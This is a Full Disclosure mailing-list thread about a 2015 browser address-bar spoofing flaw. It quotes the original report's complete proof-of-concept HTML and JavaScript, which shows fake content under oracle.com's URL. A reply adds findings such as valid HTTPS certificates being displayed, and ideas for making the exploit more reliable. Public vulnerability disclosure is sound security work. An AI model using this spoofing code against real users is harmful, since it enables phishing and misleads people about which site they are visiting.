That's pretty neat. Played around with this and made a few discoveries. 1. It shows a valid certificate when you spoof HTTPS sites. That's really bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc
2. The page isn't responsive when using this flaw. That means you can't spoof a login box for example. (I tried.) 3. The success of the exploit seems to depend on if the browser can start loading content.html fast enough. I noticed that the exploit works 100% of the time when used locally. Perhaps a better version of the exploit would somehow preload content.html - for example by opening a window with an URL that starts with javascript: followed by a script to display the content? That, or perhaps reducing the interval time for trying to run next() after the popup is created. I wonder if this works on any other browsers? MustafaOn 30 Jun 2015 7:08 am, David Leo <[email protected]> wrote: > > Impact: > The "click to verify" thing is completely broken... > Anyone can be "BBB Accredited Business" etc. > You can make whitehouse.gov display "We love Islamic State" :-) > > Note: > No user interaction on the fake page. > > Code: > ***** index.html > <script> > function next() > { > w.location.replace('http://www.oracle.com/index.html?'+n);n++; > setTimeout("next();",15); > setTimeout("next();",25); > } > function f() > { > w=window.open("content.html","_blank","width=500 height=500"); > i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); > > } > </script> > <a href="#" onclick="f()">Go</a><br> > ***** content.html > <b>This web page is NOT oracle.com</b> > <script>location="http://www.oracle.com/index.html";;</script> > ***** It's online > http://www.deusen.co.uk/items/gwhere.6128645971389012/ > (The page says "June/16/2015" - it works as we tested today) > > Request For Comment: > We reported this to Google. > They reproduced, and say > It's DoS which doesn't matter. > We think it's very strange, > since the browser does not crash(not DoS), > and the threat is obvious. > What's your opinion? > > Kind Regards, > > PS > We love clever tricks. > We love this: > http://dieyu.org/ > > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
